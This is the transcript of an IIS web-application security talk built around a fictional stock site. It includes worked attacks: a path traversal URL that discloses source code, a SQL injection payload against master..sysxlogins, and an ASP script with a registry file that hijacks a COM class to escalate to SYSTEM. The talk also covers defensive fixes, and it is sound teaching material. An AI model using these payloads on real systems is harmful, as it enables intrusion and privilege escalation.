application assessments on iis
DESCRIPTION
Application Assessments on IIS. Welcome!. David Litchfield. ([email protected]). What is an Application Assessment?. Part of a network vulnerability assessment. Application provides the site functionality. Application is least tested but often proves to be the greatest risk. - PowerPoint PPT PresentationTRANSCRIPT
Application Assessments on IISApplication Assessments on IIS
What is an Application Assessment?
Part of a network vulnerability assessment
Application provides the site functionality
Application is least tested but often proves to be the
greatest risk
Vulnerability Scanners
• Cybercop
• I. S. S.
• Cerberus Internet Scanner
What scanners do do
They highlight known vulnerabilities in COTS products
Webhits.dll and null.htw
MSADC and RDS
Ism.dll and .htr overflow
%C0%AF UNICODE issue
What scanners don’t do
They won’t assess your application
Assessing the Application
What services does the site offer?
What functionality exists to provide these services?
What drives this functionality?
How does it do this?
Stocks-r-us.com
• Free charting service of current/real-time market trends
• A subscriber service providing detailed market analysis
• An “I’ve forgot my password” service
• A contact service
• Apply for a job with stocks-r-us.com online service
Free charting service of current/real-time market trends
• From a web form a user chooses the stock market
• They also choose a time range
• On Submitting a page called read_img.asp returns a graph
of the ups and downs of the market:
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
Exception Handling
ASP Error 800814:
Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing but there are
two issues here: bad exception handling and .inc has
not been mapped to asp.dll
A search on google reveals Olectra Chart
Source code revelation!
Olectra creates a virtual directory called /octemp
When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”
The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png
/read_img.asp?IDN=../&IFN=read_img&IFE=asp
SQL Queries
strSQL = “select price from stocks where name = ‘”
_ & request.querystring(“company”) & “’”
This code is insecure!!!
Why?
By setting the “company” parameter to something such as:
ISSX’ select * from master..sysxlogins
Would execute the two queries in batch mode:
Select price from stocks where name= ‘ISSX’Select * from master..sysxlogins
‘sa’ login on MS SQL Server
xp_cmdshell extended stored procedure
On its own, ASP will not escape a single ‘ (quote mark)
.idc files will.
Change all ‘s provided in a parameter to 0x27 or strip them out
Consideration for integer input
strSQL = “Select company from stocks where price > “ & request.querystring(“price”)
Again we can insert an arbitrary SQL query here and have it execute.
IsNumeric() for VBScript
NaN() fro JScript
Verifying numeric input
r.f.p – Rain Forest Puppy
http://www.wiretrip.net/rfp
Contact Service
<%
..
SMTPObj = GetObject(
“IIS://” & request.servervariables(“SERVER_NAME”) & “/SMTPSVC”)
..
%>
HTTP SERVER_NAME Poisoning
“Host:” HTTP Client Header field
• Learn the password hash for the IWAM account
• Enumerate SQL servers
• Proxy attacks
• Samples on IIS
• ADSI, Corba and COM
On-line job application service
As part of this service stocks-r-us.com allow uploading of Curriculum Vitaes / Resumes
Client Side checking doesn’t work
Scripting enabled on the /cvtemp virtual directory
Gaining SYSTEM Privileges using ASP
• IIS Security Model
• IUSR and IWAM accounts
Wscript.Shell Object
WSObj = CreateObject(“wscript.shell”)
• Read from the Registry
• Write to the Regsitry
• Execute commands
<%
Dim WshShell, strCMD, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
MSI.ASP
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
MSI.REG
Summary
• Understand the technology you’re dealing with
• Never trust user input – anywhere
• Ensure permissions are set properly
• Don’t trust third-party software until truly evaluated
• Don’t rely on client side checking
• Scanners won’t find these problems – you will
Questions?
Thanks and enjoy the rest the day!